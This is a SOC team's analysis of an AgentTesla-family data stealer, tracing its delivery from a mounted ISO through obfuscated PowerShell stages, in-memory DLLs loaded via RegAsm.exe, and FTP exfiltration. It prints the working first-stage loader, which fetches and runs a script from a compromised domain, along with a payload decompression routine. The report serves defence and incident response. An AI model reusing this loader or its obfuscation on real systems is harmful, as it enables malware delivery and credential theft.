Analysis of a stealer from the AgentTesla family

The SOC360 team monitors the networks, endpoints and cloud environments of the largest organisations in Poland, using EDR/XDR/NDR technologies from leading manufacturers (SentinelOne, PaloAlto, Crowdstrike, MDE, Fidelis, Cybereason). During the analysis, the SOC360 team encounters various types of software, often ambiguously classified by security systems, which requires detailed context verification. This allows for appropriate responses and recommendations to be made.

Introduction

This report summarises the analysis of highly obfuscated, recently developed software that is unrecognisable by most commercial reputation engines, which was used to steal data from one of the hosts. The stages of the attack included downloading a malicious script, connecting to a URL in a Polish domain to download the second stage, downloading and running two independent .dll files, and finally stealing data from various resources and sending the data to the attackers' FTP server.

A few days after the attack, the malicious script was attributed to the AgentTesla family – one of the most popular RATs/Stealers on the market.

First detection

On 1 February 2024, a suspicious .bat script was detected at one of our customers. The file path containing CdRom0 suggested that an ISO image had been mounted on the host, which is a popular method of delivering malware during the period in question. The file was not signed, and the source process was identified as explorer.exe, which most likely suggests that the file was manually executed after being downloaded by the user. On the day of detection, the file was marked as safe by all available IT sources and analysed in the cloud for the first time just two hours before detection. Detection in the EDR system implemented at the customer's site was caused by a dynamic detection engine verifying the full activity history of the suspicious process.

What should be immediately noted is:

The number and type of dynamic indicators, especially those that may suggest information theft.
Running PowerShell scripts, including those using processes classified as LOLBin.
CdRom0 in the path indicating the mounting of an ISO image – a typical entry vector during this period.
A file name imitating an Office document.
Creation of an alias for the Invoke-Expression function – one of many typical obfuscation methods.

Analysis of the first script (fake text document)

The first of the scripts called, clearly visible from the telemetry collected by the EDR system, was deobfuscated and allowed access to the next stages of the attack. The remaining scripts and downloaded executable files were run in the process memory and were not visible from the system telemetry. Despite this, a quick reverse analysis of the script from the first stage allowed the subsequent stages to be downloaded and saved for further analysis before the attackers' infrastructure had time to rotate and thus become inaccessible.

“$rt=“x”,'e',“I”;[Array]::Reverse($rt);sal z ($rt -join “”);$t56fg = [Enum]::ToObject([System.Net.SecurityProtocolType], 3072); [System.Net.ServicePointManager]::SecurityProtocol = $t56fg;$tpg=“[void”,'] [Syst',“em.Refle”,'ction. Assembly]::LoadWithPartialName(“'Microsoft.VisualBasic”')“;z($tpg -join ”');do {$ping = test-connection -comp google.com -count 1 -Quiet} until ($ping);$tty55='(New- Object',“t.We”,'bCli',“ent)”;$tty=z($tty55 -join “”);$tty;$rot=“Download”,'Str',“ing”;$rotJ=($rot -join “”); $bnt=“https”,'://regplast.pl/mx1.jpg';$bntJ=($bnt -join “”);$mv= [Microsoft.VisualBasic.Interaction]::CallByname($tty,$rotJ,[Microsoft.VisualBasic.CallType]::Method,$bntJ);z($mv)”

After deobfuscation, it looks like this:

[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
[void] [Reflection.Assembly]::LoadWithPartialName(“Microsoft.VisualBasic”)
do {
$ping = Test-Connection -ComputerName google.com -Count 1 -Quiet
} until ($ping)
$webClient = New-Object Net.WebClient
$url = “https://regplast.pl/mx1.jpg”
$content = $webClient.DownloadString($url)
Invoke-Expression $content”

The script sets an alias under the letter ‘z’ for the Invoke-Expression function, which takes a string of characters as a parameter that is the code to be executed. This alias is then used repeatedly both to run the deobfuscation functions needed to decode subsequent fragments of malicious code and to execute that code in the context of the current console session. These actions continue until the very end of the data theft process. Most of the PowerShell code fragments executed in the malicious script were, of course, heavily obfuscated, e.g. by:

Splitting names and variables into multiple fragments
Reversing the order of characters in strings
Encoding strings using various methods, both native and manually implemented by malware developers

The script then checks the possibility of establishing internet communication and downloads further code written in PowerShell, disguised as an image. The file comes from the address https://.pl/mx1.jpg. The domain belongs to a real Polish organisation that has previously been compromised by malicious actors. The use of compromised infrastructure is a very convenient method for attackers, not only facilitating the bypassing of security systems but also hindering the work of analysts. This is due, among other things, to the fact that:

detection engines do not detect the domain as malicious for a long time
its history, including the registration period and the registering entity, inspire trust (also in systems)
trusted SSL certificates do not arouse suspicion
network traffic looks standard (expected)
in some situations, it is impossible to block such domains immediately

Analysis of the second script

The file pretending to be an image downloaded from the .pl domain was another heavily obfuscated PowerShell script. It contained additional comments intended to convince the user who displayed it that it was for educational purposes (This script isn’t meant to be used for bad intentions. This is for educational purposes only.). This file is unknown to TI sources. For the purposes of this report, it will be referred to as MalPSScript1.ps1.

The file defined an encrypted function $m0ght, which was loaded into the session. To decrypt the command, it was necessary to:

Replace the letter ‘A’ with the character ‘00’ to create a table of bytes (8 bits stored as binary numbers).
Convert the binary string to an integer value.
Convert the integer values to a string using UTF-8 decoding.
Use the previously loaded and used $bd=»[system.String]::Join(«“”», $m0ght)« function to join the letters and create the final script.

Function rt45fg00

Below is the fully deobfuscated function rt45fg00, which is part of the fake image and is responsible for the correct execution of the rest of the code:

“function rt45fg00 {
[CmdletBinding()] Param ([byte[]] $byteArray) Process {
$gkdf = (“([IO.Compression.CompressionMode]::Decompress)”) | z
$vwlOVUmY = (“New-” + “Objec” + “t System” + “.IO.Mem” + “oryStream( , $by” + “teArray )”) | z 
$pXWabbBT = (“Ne” + “w-Obj” + “ect Syst” + “em.IO.Mem” + “oryS” + “tream”) | z
$lfKDElJ = New-Object System.IO.Compression.GzipStream $vwlOVUmY, $gkdf 
$ULxHecLpL = (“New” + “-Object by” + “te[](10” + “24)”) | z
while ($true) {
$iLQC = $lfKDElJ.Read($ULxHecLpL, 0, 1024)
if ($iLQC -le 0) { break }
$pXWabbBT.Write($ULxHecLpL, 0, $iLQC)
}
[byte[]] $bout = $pXWabbBT.ToArray ()
Write-Output $bout
}
}

The function was responsible for decompressing and executing the encrypted code present in the rest of MalPSScript1. It decoded key variables that were then passed as parameters to the final functionality of the code. Its task was to create the $bout variable from a string of bytes passed as arguments to the function. The decoded result was a binary .dll file, which was later loaded into the session and used in the rest of the attack. This was a complex way of loading the .dll file in order to use the additional functions defined in it. The function call and the variables themselves passed as arguments were, as expected, defined in randomly scattered fragments of the file to further complicate analysis.

First deobfuscated .dll file

At the end of the script, a function call named Black was located in the toooyou namespace defined by the software developer. The arguments were the string ‘RegAsm.exe’ and a long byte array located in the file (a fake image). Such a call clearly indicates the need to define the Black function in the first of the long byte strings.

RegAsm.exe is a well-known LOLBin process that can be used to load a .dll library and call the objects defined in it, thus deceiving simple security mechanisms and remaining undetected. Passing a byte array to the RegAsm.exe process and calling it in this way was expected behaviour.

Given the knowledge gained about the operation of the rt45fg00 function and the rest of the MalPSScript.ps1 file, the following actions were performed on the first byte array ($y74gh00rffd) to better understand its role, as well as the role of the toooyou namespace and the Black function in the course of the attack:

W% was replaced with 0x to create a valid byte array.
The variable was specified as an argument to the rt45fg00 function and executed to decompress the content.
The file was saved to disk so that it could be debugged using external tools.

Due to the use of PowerShell scripts and the typical structure of malware, the analysis suggested that this was a .dll library created using the .Net environment. As expected, the decompilation was successful and it was possible to analyse the first of the .dll libraries. For the purposes of this report, it was named dll1.dll. This file was unknown to TI sources. The main goal was to find the definition of the Black function used later in the script to load the second byte string.

Analysis of the second byte array

During the analysis, it was suspected that the dll1.dll file was mainly used to create obfuscated functions that allowed attackers to run RegAsm.exe without detection. Therefore, most of the target malicious functions should already be in the second byte array defined in the object named $IFmn. This was the same object that was then passed as the second parameter alongside RegAsm.exe (expected call to malicious .dll using LOLBin RegAsm.exe). Performing steps similar to those for dll1.dll, the dll2.dll file was extracted from the script. This file was unknown to TI sources. For the purposes of this report, we will refer to it as dll2.dll. As expected, the dll2.dll file, prepared for invocation using RegAsm.exe, contained a number of obfuscated functions whose main purpose was to exfiltrate user data.

The file was heavily obfuscated. It contained a lot of unnecessary, unused code and references, randomly generated variable and function names, artificially created complex variables storing constant integer values and configuration parameters, etc. During the analysis, we managed to extract many suspicious functions referring to the Windows API, as well as non-standard, hand-written namespaces used to enumerate the host and then find and exfiltrate data from the victim's computer. Data theft included, among others:

monitoring keystrokes entered by the user
taking periodic screenshots of the victim's computer monitor
stealing the contents of the victim's clipboard (copy/paste)
stealing login details stored in popular web browsers
stealing data from misconfigured databases of various types
stealing data from vulnerable password storage applications

The subsequent functions called were structured to:

Enumerate the host (system, user, domain data, and much more).
Establish persistence on the host using the Task Scheduler.
Steal data from as many sources as possible and send it to the attackers' server.

All data was carefully collected into a coherent data structure before being sent to the attackers' server. The data included system and time information as well as the stolen data itself. It was possible to extract parameters indicating exfiltration via the FTP protocol.

FTP server

Each of the infected hosts had its own endpoint to which data was sent:

It is possible to log in to the FTP server using the credentials found in the decompiled .dll library. It is necessary to first identify the specific infected endpoint, as logging in alone does not allow the user to navigate to any directory other than the home directory. Each directory is described by the date, computer name, and user, which makes it virtually impossible to search for other infected victims.

Summary

This analysis is an excellent example of how attackers use various code obfuscation methods to bypass security mechanisms and remain undetected, including in the area of securing stolen data. A simple analysis by an inexperienced analyst may result in the attack being overlooked, as TI sources are completely misleading in such cases (metadata rotation, e.g. checksum, is trivial). In such situations, an in-depth analysis is necessary for the analyst to obtain all the necessary information about the attack, and in particular to be able to take appropriate remedial action and prepare recommendations based on this information. This is a good case study demonstrating the need to use EDR systems, simultaneously search for data in CTI sources, and perform backward code analysis including code deobfuscation and decompilation. Based on specific code fragments and the obfuscation methods used, the threat was classified as RAT/Stealer from the AgentTesla family.